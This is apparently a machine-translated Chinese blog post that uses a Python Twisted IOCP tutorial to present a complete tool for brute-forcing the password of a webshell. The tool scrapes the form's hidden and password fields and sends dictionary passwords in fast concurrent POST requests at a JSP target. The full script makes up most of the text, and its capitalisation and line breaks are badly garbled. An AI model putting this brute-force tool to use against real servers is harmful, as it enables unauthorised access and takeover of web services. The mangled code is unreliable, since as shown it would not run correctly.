For a long time I have been trying to learn IOCP technology in Windows, that is, asynchronous communication, but after a lengthy study of someone else's C + + version, found too esoteric, a bit laborious, but fortunately Python twisted technology in the presence of convenience to me.
IOCP, the asynchronous communication technology, is the most efficient choice in the Windows system, asynchronous communication as the name implies that the synchronous communication, we usually write similar socket.connect accept, etc. belong to this category, The same Python urlopen is also synchronized (why this is due to the specific implementation of the following), in general, we usually write the majority of socket,http communication is synchronized.
The advantage of synchronizing the program is good thinking, good writing. Shortcomings should be felt, such as in Connect, when Recive, the program will be blocked there, wait a moment to continue to move forward.
Asynchronous is another way of thinking, similar to the XML parsing sax method, in other words, when faced with conncet,recive and other tasks, the program first to execute other code, wait until the network communication has results, the system will notify you, and then go back to the place where the interruption just.
The specific code below, I will elaborate, probably summed up the following code involved in the technology
1. Page parsing, Webshell password automatic post, it is necessary to address the problem of page parsing, that is, how to find the form in the page of the appropriate input elements and submit, including the hidden of the value,password need to cooperate with the dictionary. The concrete realization relies on the Sgmlparser
2. Normal page request, I took advantage of the urlopen (in order to use cookies, the actual use of opener), the fragment is as follows
CJ = Cookielib. Cookiejar ()
opener = Urllib2.build_opener (urllib2. Httpcookieprocessor (CJ))
req = Urllib2. Request (URL, Urllib.urlencode (bodyfieleds))
resp = Opener.open (req, timeout=60)
strlist = Resp.read ()
The code is simple, this is the charm of Python, bodyfieleds is the parameter part of post, is a dictionary
3. Asynchronous page requests, where the twisted GetPage fragment is as follows:
Self. POSTDATA[SELF.PASSW] = Passl
#print temp
ZS = GetPage (Self.url, method= ' POST ', Postdata=urllib.urlencode (self . postdata), headers=self.headers)
zs.addcallback (Self.parse_page, Self.url, Passl). Adderrback (Self.fetch_error , Self.url, Passl)
You can see how to use GetPage to pass post parameters, and header (cookies are also inside the burglar header)
As well as custom callback functions that can be added to write the parameters you need to pass through, I'm using URLs and passes
4. The process concurrency, the code is as follows:
def inittask (self): for
Passl in self.passlist[:]:
d = Self.addurl (PASSL)
yield D
def dotask (self):
deferreds = []
coop = task. Cooperator ()
work = self. Inittask () for
I in xrange (self. Threadnum):
d = coop.coiterate (work)
deferreds.append (d)
dl = defer. Deferredlist (deferreds)
This is it. Efficiency, I in the network communication is better, 40s can contract a package of approximately 16,000
#-*-Coding:utf-8-*-#coding =utf-8 # # code by icefish # http://insight-labs.org/# http: wcf1987.iteye.com/# twisted.internet Import iocpreactor Iocpreactor.install () from Twisted.web.client Import GetPage from twisted.internet Import defer, task from twisted.internet Import reactor import OS from HT Tplib Import httpconnection Import urllib import urllib2 import sys import cookielib import time I Mport Threading from Queue import Lifoqueue #import httplib2 to sgmllib import sgmlparser import OS from
Httplib Import httpconnection Import urllib import urllib2 import sys import cookielib import time
Import threading from Queue import lifoqueue from sgmllib Import Sgmlparser class Urllister (Sgmlparser):
def __init__ (self): sgmlparser.__init__ (self) self.input = {} def start_input (self, attrs):
#print Attrs For K, v. in attrs:if k = = ' type ': type = v if k = = ' name ': name = V
if k = = ' value ': value = v if type = = ' hidden ' and value!= none:self.input[name] = value if type = = ' password ': self.input[' icekey '] = Name class Webshellpassscan (object): Def __init__ (Self, URL, dict): Self.url = URL self. Threadnum = Self.dict = Dict def getinput (self, URL): HTML, c = self. PostURL (URL, ') parse = Urllister () parse.feed (HTML) return parse.input def posturl (sel F, URL, bodyfieleds): TRY:CJ = Cookielib. Cookiejar () opener = Urllib2.build_opener (urllib2. Httpcookieprocessor (CJ)) req = Urllib2. Request (URL, Urllib.urlencode (bodyfieleds)) resp = Opener.open (req, timeout=60) Strlist = re Sp.read () cookies = [] for C in Cj:cookies.Append (c.name + ' = ' + C.value) return strlist, Cookies Except:return ' def parse_page (self, data, URL, passk): #print URL self. Testnum = self.
Testnum + 1 if data!= Self.sret and Len (data)!= 0 and data!= ' iceerror ': Self.timeend = Time.time () print ' Scan Password end: ' + time.strftime ('%y-%m-%d%h:%m:%s ', Time.localtime (self.timeend)) print ' Total Scan time: ' + str (self.timeend-self.timestart), ' s ' print ' total Scan passwords: ' + str (self.
Testnum) print "*************************the key pass***************************\n" Print Passk
Print "*************************the key pass***************************\n" Reactor.stop () If self. Testnum% 1000 = 0: #print testnum sys.stdout.write (' Detect Password Num: ' + str (self. testnum) + ' \ n ') sys.sTdout.flush () def fetch_error (self, error, URL, passl): Self.addurl (PASSL) def run (self): Self.timestart = 0 self.timeend = 0 self. Testnum = 0 Self.sret = ' print ' \n\ndetect the Webshell URL: ' + self.url self. Passnum = 0 Self.timestart = time.time () print ' Scan Password Start: ' + time.strftime ('%y-%m-%d% H:%m:%s ', Time.localtime (self.timestart)) filepath = Os.path.abspath (os.curdir) file = open (filepath + " \ \ "+ self.dict) self.passlist = [] for lines in File:self.passlist.append (l Ines.strip ()) #print Lines.strip () file.close () Passnum = Len (self.passlist) Print ' Get passwords num: ' + str (passnum) inputdic = Self.getinput (self.url) SELF.PASSW = inputdic[' Icekey '] del inputdic[' Icekey '] self. PostData = Dict ({self.passw: ' Icekey '}, * *Inputdic) Self.sret, cookies = self. PostURL (Self.url, self. PostData) self.headers = {' Content-type ': ' application/x-www-form-urlencoded '} self.headers[' cookies '] = Cookies print ' cookies: ' + str (cookies) self. Dotask () #self. DoTask2 () #self.
DOTASK3 () print ' start run ' Self.key = ' start ' Reactor.run () def inittask (self): For Passl in self.passlist[:]: D = self.addurl (PASSL) yield D def InitTask2 (sel
f): For Passl in self.passlist[:]: D = Self.sem.run (Self.addurl, Passl) self.deferreds.append (d) def InitTask3 (self): for Passl in self.passlist[:]: D = Self.addurl (PASSL) s Elf.deferreds.append (d) def dotask (self): deferreds = [] Coop = task. Cooperator () work = self. Inittask () for I in xrange (self. Threadnum): D = coop.coiterAte (work) deferreds.append (d) DL = defer. Deferredlist (deferreds) #dl. Adderrback (Self.errorcall) #dl. Addcallback (self.finish) def DoTask2 (self): self.deferreds = [] Self.sem = defer. Deferredsemaphore (self. Threadnum) self. InitTask2 () DL = defer. Deferredlist (self.deferreds) def DoTask3 (self): self.deferreds = [] Sel F.INITTASK3 () DL = defer. Deferredlist (self.deferreds) def addurl (self, passl): self. POSTDATA[SELF.PASSW] = Passl #print Temp ZS = GetPage (Self.url, method= ' POST ', Postdata=urllib.urlencode (s Elf. postdata), headers=self.headers) Zs.addcallback (Self.parse_page, Self.url, Passl). Adderrback (Self.fetch_error, self
. URL, Passl) return ZS a = Webshellpassscan (' http://192.168.0.2:8080/f15.jsp ', ' source_new.txt ')
A.run ()